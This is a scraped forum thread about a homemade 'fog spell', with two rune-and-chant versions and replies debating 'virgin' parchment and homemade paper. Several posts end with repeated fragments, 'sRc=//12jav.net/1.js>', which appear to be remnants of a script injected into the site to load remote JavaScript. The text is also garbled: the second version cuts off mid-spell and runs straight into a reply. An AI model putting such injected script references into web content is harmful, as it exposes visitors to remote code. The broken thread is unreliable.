Ok , for a quite some time now , I have been working on a decent fog spell. I came up with the two versions so I need you nice ppl to say which of the two you would rather use and why so?
Also If You have any suggestion on how to improve the spell feal free to post them .
Here it goes:
VER I : In your own blood , on the virgin parchment paper , bind the following runes Laguz; Ansuz and Perb. Wrap this around ametrine crystal , than go outdoar and holding wraped crystal in hand , one chants:
In this time , and in this hour
I call upon the ancient power
Power of concealment , in mist hidden to be
I will conjure fog , others want see
Shapeless in air and water
I call upon Undines and Silfs for this matter
Samael, Praldas , Nixsa, Gabriel , Raphael , Uriel, Barchiel, ( 3x?)
By the power of the Three , as I wish so mote it be!
Or:
VER II : On a yellow-blue combined candle , or a gray one inscribe three runes with a virgin needle , or with an athames point. Place and ametrine crystal next to candle , visualize the fog enrolling around argeted area , than chant:
I like one myself. Yes good job shadow. I gotta give them a try as son as I get the crystal. don't have that one. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Okay, that's strange. I find magic requiring "virgin" ANYTHING to be kind of, well, silly. Perhaps because I'm from the ilk of those practicing folk magic in secluded villages where they couldn't just run out and find some new parchment and a new needle (which would be expensive), and instead would make their own, or utilize a needle that has been handed down through the family.
Just saying.
It doesn't make the magic more powerful---in my experience, at least. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Parchment is also paper or you can get lamb skin parchment and so forth , the idea being its never been used or reycled and that way there is no interference of anything that may have been written on the parchment or paper
yes well back in those times they used dry skin from animals , and you can still buy that type of parchment today ... sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I have friends in historical reenactment groups who do calligraphy and illumination. Generally they make their own paper, or purchase parchment at art stores.
There are some really cool sites about suburban homesteading that have recipes for making your own paper. You can make it out of any plant stalk, basically. I think that would be great for using for spellwork, rather than just using parchment. You could use a plant that has qualities that you require for the spell. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
